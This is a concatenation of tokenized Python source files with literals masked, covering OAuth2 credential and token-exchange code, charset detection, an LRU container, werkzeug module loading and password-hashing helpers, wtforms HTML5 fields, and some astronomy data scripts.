'<STR_LIT>' : assertion , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return body <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _revoke ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> self . _do_revoke ( http_request , self . access_token ) <EOL> if HAS_CRYPTO : <EOL> class SignedJwtAssertionCredentials ( AssertionCredentials ) : <EOL> """<STR_LIT>""" <EOL> MAX_TOKEN_LIFETIME_SECS = <NUM_LIT> <EOL> @ util . positional ( <NUM_LIT:4> ) <EOL> def __init__ ( self , <EOL> service_account_name , <EOL> private_key , <EOL> scope , <EOL> private_key_password = '<STR_LIT>' , <EOL> user_agent = None , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( SignedJwtAssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> user_agent = user_agent , <EOL> token_uri = token_uri , <EOL> revoke_uri = revoke_uri , <EOL> ) <EOL> self . scope = util . scopes_to_string ( scope ) <EOL> self . private_key = base64 . b64encode ( private_key ) <EOL> self . private_key_password = private_key_password <EOL> self . service_account_name = service_account_name <EOL> self . kwargs = kwargs <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = SignedJwtAssertionCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> base64 . b64decode ( data [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] , <EOL> private_key_password = data [ '<STR_LIT>' ] , <EOL> user_agent = data [ '<STR_LIT>' ] , <EOL> token_uri = data [ '<STR_LIT>' ] , <EOL> ** data [ '<STR_LIT>' ] <EOL> ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> retval . access_token = data [ '<STR_LIT>' ] <EOL> return retval <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> now = long ( time . time ( ) ) <EOL> payload = { <EOL> '<STR_LIT>' : self . token_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> '<STR_LIT>' : now , <EOL> '<STR_LIT>' : now + SignedJwtAssertionCredentials . MAX_TOKEN_LIFETIME_SECS , <EOL> '<STR_LIT>' : self . service_account_name <EOL> } <EOL> payload . update ( self . kwargs ) <EOL> logger . debug ( str ( payload ) ) <EOL> private_key = base64 . b64decode ( self . private_key ) <EOL> return crypt . make_signed_jwt ( crypt . Signer . from_string ( <EOL> private_key , self . private_key_password ) , payload ) <EOL> _cached_http = httplib2 . Http ( MemoryCache ( ) ) <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def verify_id_token ( id_token , audience , http = None , <EOL> cert_uri = ID_TOKEN_VERIFICATON_CERTS ) : <EOL> """<STR_LIT>""" <EOL> if http is None : <EOL> http = _cached_http <EOL> resp , content = http . request ( cert_uri ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> certs = simplejson . loads ( content ) <EOL> return crypt . verify_signed_jwt_with_certs ( id_token , certs , audience ) <EOL> else : <EOL> raise VerifyJwtTokenError ( '<STR_LIT>' % resp . status ) <EOL> def _urlsafe_b64decode ( b64string ) : <EOL> b64string = b64string . encode ( '<STR_LIT:ascii>' ) <EOL> padded = b64string + '<STR_LIT:=>' * ( <NUM_LIT:4> - len ( b64string ) % <NUM_LIT:4> ) <EOL> return base64 . urlsafe_b64decode ( padded ) <EOL> def _extract_id_token ( id_token ) : <EOL> """<STR_LIT>""" <EOL> segments = id_token . split ( '<STR_LIT:.>' ) <EOL> if ( len ( segments ) != <NUM_LIT:3> ) : <EOL> raise VerifyJwtTokenError ( <EOL> '<STR_LIT>' % id_token ) <EOL> return simplejson . loads ( _urlsafe_b64decode ( segments [ <NUM_LIT:1> ] ) ) <EOL> def _parse_exchange_token_response ( content ) : <EOL> """<STR_LIT>""" <EOL> resp = { } <EOL> try : <EOL> resp = simplejson . loads ( content ) <EOL> except StandardError : <EOL> resp = dict ( parse_qsl ( content ) ) <EOL> if resp and '<STR_LIT>' in resp : <EOL> resp [ '<STR_LIT>' ] = resp . pop ( '<STR_LIT>' ) <EOL> return resp <EOL> @ util . positional ( <NUM_LIT:4> ) <EOL> def credentials_from_code ( client_id , client_secret , scope , code , <EOL> redirect_uri = '<STR_LIT>' , http = None , <EOL> user_agent = None , token_uri = GOOGLE_TOKEN_URI , <EOL> auth_uri = GOOGLE_AUTH_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI ) : <EOL> """<STR_LIT>""" <EOL> flow = OAuth2WebServerFlow ( client_id , client_secret , scope , <EOL> redirect_uri = redirect_uri , user_agent = user_agent , <EOL> auth_uri = auth_uri , token_uri = token_uri , <EOL> revoke_uri = revoke_uri ) <EOL> credentials = flow . step2_exchange ( code , http = http ) <EOL> return credentials <EOL> @ util . positional ( <NUM_LIT:3> ) <EOL> def credentials_from_clientsecrets_and_code ( filename , scope , code , <EOL> message = None , <EOL> redirect_uri = '<STR_LIT>' , <EOL> http = None , <EOL> cache = None ) : <EOL> """<STR_LIT>""" <EOL> flow = flow_from_clientsecrets ( filename , scope , message = message , cache = cache , <EOL> redirect_uri = redirect_uri ) <EOL> credentials = flow . step2_exchange ( code , http = http ) <EOL> return credentials <EOL> class OAuth2WebServerFlow ( Flow ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:4> ) <EOL> def __init__ ( self , client_id , client_secret , scope , <EOL> redirect_uri = None , <EOL> user_agent = None , <EOL> auth_uri = GOOGLE_AUTH_URI , <EOL> token_uri = GOOGLE_TOKEN_URI , <EOL> revoke_uri = GOOGLE_REVOKE_URI , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . scope = util . scopes_to_string ( scope ) <EOL> self . redirect_uri = redirect_uri <EOL> self . user_agent = user_agent <EOL> self . auth_uri = auth_uri <EOL> self . token_uri = token_uri <EOL> self . revoke_uri = revoke_uri <EOL> self . params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> } <EOL> self . params . update ( kwargs ) <EOL> @ util . positional ( <NUM_LIT:1> ) <EOL> def step1_get_authorize_url ( self , redirect_uri = None ) : <EOL> """<STR_LIT>""" <EOL> if redirect_uri is not None : <EOL> logger . warning ( ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . redirect_uri = redirect_uri <EOL> if self . redirect_uri is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> query_params = { <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } <EOL> query_params . update ( self . params ) <EOL> return _update_query_params ( self . auth_uri , query_params ) <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def step2_exchange ( self , code , http = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( code , str ) or isinstance ( code , unicode ) ) : <EOL> if '<STR_LIT:code>' not in code : <EOL> if '<STR_LIT:error>' in code : <EOL> error_msg = code [ '<STR_LIT:error>' ] <EOL> else : <EOL> error_msg = '<STR_LIT>' <EOL> raise FlowExchangeError ( error_msg ) <EOL> else : <EOL> code = code [ '<STR_LIT:code>' ] <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:code>' : code , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( self . token_uri , method = '<STR_LIT:POST>' , body = body , <EOL> headers = headers ) <EOL> d = _parse_exchange_token_response ( content ) <EOL> if resp . status == <NUM_LIT:200> and '<STR_LIT>' in d : <EOL> access_token = d [ '<STR_LIT>' ] <EOL> refresh_token = d . get ( '<STR_LIT>' , None ) <EOL> token_expiry = None <EOL> if '<STR_LIT>' in d : <EOL> token_expiry = datetime . datetime . utcnow ( ) + datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT>' in d : <EOL> d [ '<STR_LIT>' ] = _extract_id_token ( d [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> return OAuth2Credentials ( access_token , self . client_id , <EOL> self . client_secret , refresh_token , token_expiry , <EOL> self . token_uri , self . user_agent , <EOL> revoke_uri = self . revoke_uri , <EOL> id_token = d . get ( '<STR_LIT>' , None ) , <EOL> token_response = d ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' % content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = unicode ( d [ '<STR_LIT:error>' ] ) <EOL> else : <EOL> error_msg = '<STR_LIT>' % str ( resp . status ) <EOL> raise FlowExchangeError ( error_msg ) <EOL> @ util . positional ( <NUM_LIT:2> ) <EOL> def flow_from_clientsecrets ( filename , scope , redirect_uri = None , <EOL> message = None , cache = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename , cache = cache ) <EOL> if client_type in ( clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ) : <EOL> constructor_kwargs = { <EOL> '<STR_LIT>' : redirect_uri , <EOL> '<STR_LIT>' : client_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : client_info [ '<STR_LIT>' ] , <EOL> } <EOL> revoke_uri = client_info . get ( '<STR_LIT>' ) <EOL> if revoke_uri is not None : <EOL> constructor_kwargs [ '<STR_LIT>' ] = revoke_uri <EOL> return OAuth2WebServerFlow ( <EOL> client_info [ '<STR_LIT>' ] , client_info [ '<STR_LIT>' ] , <EOL> scope , ** constructor_kwargs ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> if message : <EOL> sys . exit ( message ) <EOL> else : <EOL> raise <EOL> else : <EOL> raise UnknownClientSecretsFlowError ( <EOL> '<STR_LIT>' % client_type ) </s>
<s> from . import constants <EOL> import sys <EOL> from . charsetprober import CharSetProber <EOL> class CharSetGroupProber ( CharSetProber ) : <EOL> def __init__ ( self ) : <EOL> CharSetProber . __init__ ( self ) <EOL> self . _mActiveNum = <NUM_LIT:0> <EOL> self . _mProbers = [ ] <EOL> self . _mBestGuessProber = None <EOL> def reset ( self ) : <EOL> CharSetProber . reset ( self ) <EOL> self . _mActiveNum = <NUM_LIT:0> <EOL> for prober in self . _mProbers : <EOL> if prober : <EOL> prober . reset ( ) <EOL> prober . active = True <EOL> self . _mActiveNum += <NUM_LIT:1> <EOL> self . _mBestGuessProber = None <EOL> def get_charset_name ( self ) : <EOL> if not self . _mBestGuessProber : <EOL> self . get_confidence ( ) <EOL> if not self . _mBestGuessProber : <EOL> return None <EOL> return self . _mBestGuessProber . get_charset_name ( ) <EOL> def feed ( self , aBuf ) : <EOL> for prober in self . _mProbers : <EOL> if not prober : <EOL> continue <EOL> if not prober . active : <EOL> continue <EOL> st = prober . feed ( aBuf ) <EOL> if not st : <EOL> continue <EOL> if st == constants . eFoundIt : <EOL> self . _mBestGuessProber = prober <EOL> return self . get_state ( ) <EOL> elif st == constants . eNotMe : <EOL> prober . active = False <EOL> self . _mActiveNum -= <NUM_LIT:1> <EOL> if self . _mActiveNum <= <NUM_LIT:0> : <EOL> self . _mState = constants . eNotMe <EOL> return self . get_state ( ) <EOL> return self . get_state ( ) <EOL> def get_confidence ( self ) : <EOL> st = self . get_state ( ) <EOL> if st == constants . eFoundIt : <EOL> return <NUM_LIT> <EOL> elif st == constants . eNotMe : <EOL> return <NUM_LIT> <EOL> bestConf = <NUM_LIT:0.0> <EOL> self . _mBestGuessProber = None <EOL> for prober in self . _mProbers : <EOL> if not prober : <EOL> continue <EOL> if not prober . active : <EOL> if constants . _debug : <EOL> sys . stderr . write ( prober . get_charset_name ( ) <EOL> + '<STR_LIT>' ) <EOL> continue <EOL> cf = prober . get_confidence ( ) <EOL> if constants . _debug : <EOL> sys . stderr . write ( '<STR_LIT>' % <EOL> ( prober . get_charset_name ( ) , cf ) ) <EOL> if bestConf < cf : <EOL> bestConf = cf <EOL> self . _mBestGuessProber = prober <EOL> if not self . _mBestGuessProber : <EOL> return <NUM_LIT:0.0> <EOL> return bestConf </s>
<s> from collections import MutableMapping <EOL> from threading import Lock <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from . packages . ordered_dict import OrderedDict <EOL> __all__ = [ '<STR_LIT>' ] <EOL> _Null = object ( ) <EOL> class RecentlyUsedContainer ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> ContainerCls = OrderedDict <EOL> def __init__ ( self , maxsize = <NUM_LIT:10> , dispose_func = None ) : <EOL> self . _maxsize = maxsize <EOL> self . dispose_func = dispose_func <EOL> self . _container = self . ContainerCls ( ) <EOL> self . _lock = Lock ( ) <EOL> def __getitem__ ( self , key ) : <EOL> with self . _lock : <EOL> item = self . _container . pop ( key ) <EOL> self . _container [ key ] = item <EOL> return item <EOL> def __setitem__ ( self , key , value ) : <EOL> evicted_value = _Null <EOL> with self . _lock : <EOL> evicted_value = self . _container . get ( key , _Null ) <EOL> self . _container [ key ] = value <EOL> if len ( self . _container ) > self . _maxsize : <EOL> _key , evicted_value = self . _container . popitem ( last = False ) <EOL> if self . dispose_func and evicted_value is not _Null : <EOL> self . dispose_func ( evicted_value ) <EOL> def __delitem__ ( self , key ) : <EOL> with self . _lock : <EOL> value = self . _container . pop ( key ) <EOL> if self . dispose_func : <EOL> self . dispose_func ( value ) <EOL> def __len__ ( self ) : <EOL> with self . _lock : <EOL> return len ( self . _container ) <EOL> def __iter__ ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def clear ( self ) : <EOL> with self . _lock : <EOL> values = list ( self . _container . values ( ) ) <EOL> self . _container . clear ( ) <EOL> if self . dispose_func : <EOL> for value in values : <EOL> self . dispose_func ( value ) <EOL> def keys ( self ) : <EOL> with self . _lock : <EOL> return self . _container . keys ( ) </s>
<s> """<STR_LIT>""" <EOL> from types import ModuleType <EOL> import sys <EOL> __version__ = '<STR_LIT>' <EOL> all_by_module = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> attribute_modules = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> object_origins = { } <EOL> for module , items in all_by_module . iteritems ( ) : <EOL> for item in items : <EOL> object_origins [ item ] = module <EOL> class module ( ModuleType ) : <EOL> """<STR_LIT>""" <EOL> def __getattr__ ( self , name ) : <EOL> if name in object_origins : <EOL> module = __import__ ( object_origins [ name ] , None , None , [ name ] ) <EOL> for extra_name in all_by_module [ module . __name__ ] : <EOL> setattr ( self , extra_name , getattr ( module , extra_name ) ) <EOL> return getattr ( module , name ) <EOL> elif name in attribute_modules : <EOL> __import__ ( '<STR_LIT>' + name ) <EOL> return ModuleType . __getattribute__ ( self , name ) <EOL> def __dir__ ( self ) : <EOL> """<STR_LIT>""" <EOL> result = list ( new_module . __all__ ) <EOL> result . extend ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return result <EOL> old_module = sys . modules [ '<STR_LIT>' ] <EOL> new_module = sys . modules [ '<STR_LIT>' ] = module ( '<STR_LIT>' ) <EOL> new_module . __dict__ . update ( { <EOL> '<STR_LIT>' : __file__ , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : __path__ , <EOL> '<STR_LIT>' : __doc__ , <EOL> '<STR_LIT>' : __version__ , <EOL> '<STR_LIT>' : tuple ( object_origins ) + tuple ( attribute_modules ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import hmac <EOL> import posixpath <EOL> from itertools import izip <EOL> from random import SystemRandom <EOL> try : <EOL> from hashlib import sha1 , md5 <EOL> _hash_funcs = _hash_mods = { '<STR_LIT>' : sha1 , '<STR_LIT>' : md5 } <EOL> _sha1_mod = sha1 <EOL> _md5_mod = md5 <EOL> except ImportError : <EOL> import sha as _sha1_mod , md5 as _md5_mod <EOL> _hash_mods = { '<STR_LIT>' : _sha1_mod , '<STR_LIT>' : _md5_mod } <EOL> _hash_funcs = { '<STR_LIT>' : _sha1_mod . new , '<STR_LIT>' : _md5_mod . new } <EOL> SALT_CHARS = '<STR_LIT>' <EOL> _sys_rng = SystemRandom ( ) <EOL> _os_alt_seps = list ( sep for sep in [ os . path . sep , os . path . altsep ] <EOL> if sep not in ( None , '<STR_LIT:/>' ) ) <EOL> def safe_str_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> if len ( a ) != len ( b ) : <EOL> return False <EOL> rv = <NUM_LIT:0> <EOL> for x , y in izip ( a , b ) : <EOL> rv |= ord ( x ) ^ ord ( y ) <EOL> return rv == <NUM_LIT:0> <EOL> def gen_salt ( length ) : <EOL> """<STR_LIT>""" <EOL> if length <= <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' . join ( _sys_rng . choice ( SALT_CHARS ) for _ in xrange ( length ) ) <EOL> def _hash_internal ( method , salt , password ) : <EOL> """<STR_LIT>""" <EOL> if method == '<STR_LIT>' : <EOL> return password <EOL> if salt : <EOL> if method not in _hash_mods : <EOL> return None <EOL> if isinstance ( salt , unicode ) : <EOL> salt = salt . encode ( '<STR_LIT:utf-8>' ) <EOL> h = hmac . new ( salt , None , _hash_mods [ method ] ) <EOL> else : <EOL> if method not in _hash_funcs : <EOL> return None <EOL> h = _hash_funcs [ method ] ( ) <EOL> if isinstance ( password , unicode ) : <EOL> password = password . encode ( '<STR_LIT:utf-8>' ) <EOL> h . update ( password ) <EOL> return h . hexdigest ( ) <EOL> def generate_password_hash ( password , method = '<STR_LIT>' , salt_length = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> salt = method != '<STR_LIT>' and gen_salt ( salt_length ) or '<STR_LIT>' <EOL> h = _hash_internal ( method , salt , password ) <EOL> if h is None : <EOL> raise TypeError ( '<STR_LIT>' % method ) <EOL> return '<STR_LIT>' % ( method , salt , h ) <EOL> def check_password_hash ( pwhash , password ) : <EOL> """<STR_LIT>""" <EOL> if pwhash . count ( '<STR_LIT:$>' ) < <NUM_LIT:2> : <EOL> return False <EOL> method , salt , hashval = pwhash . split ( '<STR_LIT:$>' , <NUM_LIT:2> ) <EOL> return safe_str_cmp ( _hash_internal ( method , salt , password ) , hashval ) <EOL> def safe_join ( directory , filename ) : <EOL> """<STR_LIT>""" <EOL> filename = posixpath . normpath ( filename ) <EOL> for sep in _os_alt_seps : <EOL> if sep in filename : <EOL> return None <EOL> if os . path . isabs ( filename ) or filename . startswith ( '<STR_LIT>' ) : <EOL> return None <EOL> return os . path . join ( directory , filename ) </s>
<s> """<STR_LIT>""" <EOL> from . . widgets import html5 as widgets <EOL> from . import core <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> class SearchField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . SearchInput ( ) <EOL> class TelField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . TelInput ( ) <EOL> class URLField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . URLInput ( ) <EOL> class EmailField ( core . StringField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . EmailInput ( ) <EOL> class DateTimeField ( core . DateTimeField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateTimeInput ( ) <EOL> class DateField ( core . DateField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateInput ( ) <EOL> class DateTimeLocalField ( core . DateTimeField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . DateTimeLocalInput ( ) <EOL> class IntegerField ( core . IntegerField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . NumberInput ( ) <EOL> class DecimalField ( core . DecimalField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . NumberInput ( ) <EOL> class IntegerRangeField ( core . IntegerField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . RangeInput ( ) <EOL> class DecimalRangeField ( core . DecimalField ) : <EOL> """<STR_LIT>""" <EOL> widget = widgets . RangeInput ( ) </s>
<s> import logging <EOL> logging . getLogger ( __name__ ) . setLevel ( logging . DEBUG ) <EOL> logging . getLogger ( __name__ ) . addHandler ( logging . StreamHandler ( ) ) </s>
<s> import json <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from bubbly . extractors import RGBExtractor <EOL> from bubbly . dr1 import bubble_params <EOL> def hide_axes ( ) : <EOL> plt . gca ( ) . get_xaxis ( ) . set_visible ( False ) <EOL> plt . gca ( ) . get_yaxis ( ) . set_visible ( False ) <EOL> plt . gca ( ) . axis ( '<STR_LIT>' ) <EOL> def ex ( params ) : <EOL> rgb = RGBExtractor ( ) <EOL> rgb . shp = ( <NUM_LIT:200> , <NUM_LIT:200> ) <EOL> p = list ( params ) <EOL> p [ - <NUM_LIT:1> ] *= <NUM_LIT> <EOL> return rgb . extract ( * p ) <EOL> def main ( ) : <EOL> data = json . load ( open ( '<STR_LIT>' ) ) <EOL> data = data [ '<STR_LIT>' ] <EOL> images = [ ex ( data [ i ] ) for i in [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:3> , - <NUM_LIT:1> ] ] <EOL> dx = images [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] <EOL> images = np . hstack ( np . vstack ( images [ i : i + <NUM_LIT:2> ] ) for i in [ <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> plt . imshow ( images ) <EOL> kw = { '<STR_LIT>' : '<STR_LIT:w>' , '<STR_LIT>' : <NUM_LIT:4> } <EOL> plt . axhline ( dx , ** kw ) <EOL> plt . axvline ( dx , ** kw ) <EOL> kw = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } <EOL> plt . annotate ( "<STR_LIT>" , xy = ( dx / <NUM_LIT:2> , <NUM_LIT:2> * dx - <NUM_LIT> ) , color = '<STR_LIT>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( dx / <NUM_LIT:2> , dx - <NUM_LIT> ) , color = '<STR_LIT>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( <NUM_LIT:3> * dx / <NUM_LIT:2> , <NUM_LIT:2> * dx - <NUM_LIT> ) , color = '<STR_LIT:k>' , ** kw ) <EOL> plt . annotate ( "<STR_LIT>" , xy = ( <NUM_LIT:3> * dx / <NUM_LIT:2> , dx - <NUM_LIT> ) , color = '<STR_LIT:k>' , ** kw ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> hide_axes ( ) <EOL> plt . savefig ( '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import random <EOL> import json <EOL> from bubbly . model import ModelGroup <EOL> from bubbly . dr1 import UnrestrictedLocationGenerator <EOL> def locations ( ) : <EOL> random . seed ( <NUM_LIT> ) <EOL> lg = UnrestrictedLocationGenerator ( ) <EOL> fields = lg . random_iterator ( ) <EOL> return sorted ( [ next ( fields ) for _ in range ( <NUM_LIT> ) ] ) <EOL> def main ( ) : <EOL> model = ModelGroup . load ( '<STR_LIT>' ) <EOL> loc = locations ( ) <EOL> result = { '<STR_LIT>' : loc } <EOL> result [ '<STR_LIT>' ] = model . decision_function ( loc ) . tolist ( ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:w>' ) as outfile : <EOL> json . dump ( result , outfile ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> TEST_IDS_PATH = '<STR_LIT>' <EOL> TEST_IDS_DUMMY_PATH = '<STR_LIT>' <EOL> PROCESSED_TRAIN_PATH = '<STR_LIT>' <EOL> ORIGINAL_DATA_PATH = '<STR_LIT>' <EOL> ORIGINAL_DATA_CLEAN_PATH = '<STR_LIT>' <EOL> MOVIE_TAG_PATH = '<STR_LIT>' <EOL> USER_SOCIAL_PATH = '<STR_LIT>' <EOL> USER_HISTORY_PATH = '<STR_LIT>' <EOL> PROCESSED_SOCIAL = '<STR_LIT>' <EOL> PROCESSED_HISTORY = '<STR_LIT>' <EOL> PROCESSED_MOVIE_TAGS = '<STR_LIT>' <EOL> PROCESSED_DATA_PATH = '<STR_LIT>' <EOL> PROCESSED_DATA_PATH_TEMP = '<STR_LIT>' <EOL> EFFECTS_USER_PATH = '<STR_LIT>' <EOL> EFFECTS_MOVIE_PATH = '<STR_LIT>' <EOL> EFFECTS_GLOBAL_PATH = '<STR_LIT>' <EOL> MODEL_BOOT_PATH = '<STR_LIT>' <EOL> MODEL_RUN_PATH = '<STR_LIT>' <EOL> MODEL_PREDICT_PATH = '<STR_LIT>' <EOL> MODEL_TMP_PATH = '<STR_LIT>' <EOL> MODEL_FEATURED_PATH = '<STR_LIT>' <EOL> MODEL_LOG_PATH = '<STR_LIT>' <EOL> MODEL_CONFIG_PATH = '<STR_LIT>' <EOL> HYBRID_ORIGINAL_PATH = '<STR_LIT>' <EOL> HYBRID_BOOT_PATH = '<STR_LIT>' <EOL> 